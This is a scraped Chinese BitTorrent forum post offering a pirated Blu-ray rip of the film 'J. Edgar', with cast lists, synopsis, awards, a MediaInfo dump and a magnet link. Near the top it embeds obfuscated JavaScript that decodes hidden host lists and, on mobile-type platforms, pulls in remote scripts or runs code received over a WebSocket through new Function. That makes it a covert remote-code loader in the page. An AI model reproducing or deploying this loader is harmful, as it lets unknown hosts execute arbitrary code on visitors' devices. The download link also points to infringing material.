胡佛[双语字幕].J.Edgar.2011.1080p.Bluray.x264.DTS-迅雷下载 11.28GB

版主小s 19天前 197

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 胡佛 / 强?艾德格(台) / J.艾德格(港) / J·埃德加·胡佛 / 胡佛传

◎片 名 J. Edgar

◎年 代 2011

◎产 地 美国

◎类 别 剧情 / 同性 / 传记 / 历史 / 犯罪

◎语 言 英语

◎上映日期 2011-11-11(美国)

◎IMDb链接 https://www.imdb.com/title/tt1616195/

◎豆瓣评分 7.2/10 (42428人评价)

◎豆瓣链接 https://movie.douban.com/subject/4709671/

◎片 长 137分钟

◎导 演 克林特·伊斯特伍德 Clint Eastwood (id:1054436)

◎编 剧 达斯汀·兰斯·布莱克 Dustin Lance Black (id:1278722)

◎演 员 莱昂纳多·迪卡普里奥 Leonardo DiCaprio (id:1041029)

娜奥米·沃茨 Naomi Watts (id:1016675)

朱迪·丹奇 Judi Dench (id:1054384)

艾米·汉莫 Armie Hammer (id:1049997)

乔什·卢卡斯 Josh Lucas (id:1017919)

德蒙特·莫罗尼 Dermot Mulroney (id:1040534)

杰弗里·多诺万 Jeffrey Donovan (id:1044732)

丹尼斯·欧哈拉 Denis O'Hare (id:1013900)

斯蒂芬·鲁特 Stephen Root (id:1041136)

扎克·格雷尼尔 Zach Grenier (id:1099400)

达蒙·海瑞曼 Damon Herriman (id:1098686)

莉·汤普森 Lea Thompson (id:1019014)

肯·霍华德 Ken Howard (id:1096159)

约什·汉密尔顿 Josh Hamilton (id:1098942)

杰西卡·赫特 Jessica Hecht (id:1009416)

吉奥夫·皮尔森 Geoff Pierson (id:1135790)

迈克尔·奥尼尔 Michael O'Neill (id:1314617)

古纳尔·怀特 Gunner Wright (id:1230796)

戴维·A·库珀 David A. Cooper (id:1363850)

爱德·维斯特维克 Ed Westwick (id:1025139)

杰克·多内尔 Jack Donner (id:1090126)

杰克·阿克塞尔罗德 Jack Axelrod (id:1057312)

乔什·斯坦伯 Josh Stamberg (id:1152605)

迈克尔·拉代 Michael Rady (id:1022702)

斯科特·卡莱尔 Scot Carlisle (id:1363848)

赛迪·卡尔瓦诺 Sadie Calvano (id:1329230)

麦尔斯·费舍 Miles Fisher (id:1009681)

李·可可 Lea Coco (id:1345306)

艾米丽·阿琳·林德 Emily Alyn Lind (id:1317497)

杰米·拉巴伯 Jamie LaBarber (id:1363851)

阿曼达·舒尔 Amanda Schull (id:1147161)

阿莱·卡特斯 Ary Katz (id:1255561)

克里斯托弗·谢尔 Christopher Shyer (id:1322266)

拉金·坎贝尔 Larkin Campbell (id:1045624)

雷恩·麦帕林 Ryan McPartlin (id:1116626)

大卫·科列侬 David Clennon (id:1078440)

斯蒂夫·蒙罗埃 Steve Monroe (id:1124221)

小欧内斯特·哈登 Ernest Harden Jr. (id:1091660)

斯科特·C·罗伊 Scott C. Roe (id:1240782)

汤姆·阿齐迪肯 Tom Archdeacon (id:1000291)

Eric Frentzel (id:1262414)

凯勒·伊斯特伍德 Kyle Eastwood (id:1045030)

奥斯汀·巴西斯 Austin Basis (id:1190289)

Thomas Langston Thomas Langston (id:1363390)

Ernest Heinz Ernest Heinz (id:1185765)

阿隆·拉扎尔 Aaron Lazar (id:1343713)

比利·史密斯 Billy Smith (id:1265010)

约旦·布里奇斯 Jordan Bridges (id:1068939)

亚当·德赖弗 Adam Driver (id:1322327)

迈克尔·盖拉迪斯 Michael J. X. Gladis (id:1322326)

杰拉德·唐尼 Gerald Downey (id:1319898)

凯特琳·德弗 Kaitlyn Dever (id:1317629)

吉欧夫·斯图兹 Geoff Stults (id:1036382)

Manu Intiraymi Manu Intiraymi (id:1114247)

克林特·伊斯特伍德 Clint Eastwood (id:1054436)

克林特·伊斯特伍德 Clint Eastwood (id:1054436)

莱尼·涅霍斯 Lennie Niehaus (id:1018772)

◎标 签 传记 / 美国 / 政治 / 剧情 / 历史 / FBI / 同志 / 悬疑

◎简 介

年过七旬的美国联邦调查局局长埃德加·胡佛(莱昂纳多·迪卡普里奥 Leonardo DiCaprio 饰)应《犯罪纪实》之邀口述个人回忆录。胡佛向回忆录代笔作者讲述了他自1919年以来的重要人生历程:逮捕左翼分子领袖、缉拿臭名昭著的黑帮头目、破获震惊全美的林德伯格绑架案等等。依据胡佛的讲述,他力排众议,改组联邦调查局,引入高科技侦查手段,尽心尽力为美国社会的和平与稳定而操劳。然而另一方面,他的私人生活却成为了他想要极力掩饰的部分。

就在胡佛回顾自己一生的时候,美国社会依然有诸多动荡因素存在。胡佛任用多年的私人助理克莱德·托尔森(艾米·汉莫 Armie Hammer 饰)也似与他保持着不寻常的关系……

◎获奖情况 (共4项)

第69届金球奖 (2012)

电影类 剧情片最佳男主角(提名)

└──莱昂纳多·迪卡普里奥 (id:1041029)

第17届美国评论家选择电影奖 (2012)

最佳男主角(提名)

└──莱昂纳多·迪卡普里奥 (id:1041029)

最佳发型化妆(提名)

第12届美国电影学会奖 (2011)

年度佳片

  1. General

  2. Unique ID : 284339609126619584588234028121287258068 (0xD5E9D117220DA579293A1E2D2E776FD4)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.3 GiB

  7. Duration : 2 h 16 min

  8. Overall bit rate : 11.8 Mb/s

  9. Movie name : J. Edgar

  10. Encoded date : UTC 2021-07-13 04:11:32

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 2 h 16 min

  25. Bit rate : 10.2 Mb/s

  26. Width : 1 920 pixels

  27. Height : 800 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.277

  36. Stream size : 9.74 GiB (86%)

  37. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. ID in the original source medium : 4352 (0x1100)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 2 h 16 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1.44 GiB (13%)

  57. Language : English

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Text #1

  62. ID : 3

  63. ID in the original source medium : 4611 (0x1203)

  64. Format : PGS

  65. Muxing mode : zlib

  66. Codec ID : S_HDMV/PGS

  67. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration : 2 h 10 min

  69. Bit rate : 60.1 kb/s

  70. Count of elements : 3979

  71. Stream size : 56.2 MiB (0%)

  72. Title : chs&eng

  73. Language : Chinese

  74. Default : Yes

  75. Forced : No

  76. Original source medium : Blu-ray


  77. Text #2

  78. ID : 4

  79. ID in the original source medium : 4612 (0x1204)

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 2 h 10 min

  85. Bit rate : 60.6 kb/s

  86. Count of elements : 3979

  87. Stream size : 56.8 MiB (0%)

  88. Title : cht&eng

  89. Language : Chinese

  90. Default : No

  91. Forced : No

  92. Original source medium : Blu-ray


  93. Text #3

  94. ID : 5

  95. ID in the original source medium : 4613 (0x1205)

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 2 h 10 min

  101. Bit rate : 36.1 kb/s

  102. Count of elements : 3979

  103. Stream size : 33.8 MiB (0%)

  104. Title : chs

  105. Language : Chinese

  106. Default : No

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Text #4

  110. ID : 6

  111. ID in the original source medium : 4614 (0x1206)

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 2 h 10 min

  117. Bit rate : 36.6 kb/s

  118. Count of elements : 3979

  119. Stream size : 34.3 MiB (0%)

  120. Title : cht

  121. Language : Chinese

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Text #5

  126. ID : 7

  127. ID in the original source medium : 4608 (0x1200)

  128. Format : PGS

  129. Muxing mode : zlib

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 2 h 16 min

  133. Bit rate : 42.6 kb/s

  134. Count of elements : 3906

  135. Stream size : 41.5 MiB (0%)

  136. Title : eng

  137. Language : English

  138. Default : No

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:10:36.427 : Chapter 02

  144. 00:20:13.587 : Chapter 03

  145. 00:29:26.264 : Chapter 04

  146. 00:40:52.116 : Chapter 05

  147. 00:49:37.891 : Chapter 06

  148. 00:59:26.479 : Chapter 07

  149. 01:10:27.765 : Chapter 08

  150. 01:20:48.969 : Chapter 09

  151. 01:29:52.929 : Chapter 10

  152. 01:40:37.990 : Chapter 11

  153. 01:49:25.892 : Chapter 12

  154. 01:58:26.641 : Chapter 13

  155. 02:11:00.352 : Chapter 14


TAGS 剧情 犯罪 同性 历史 传记

磁力链:
  • magnet:?xt=urn:btih:6DEA833A5B1E21297AF4143E40E39959308FECC6
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回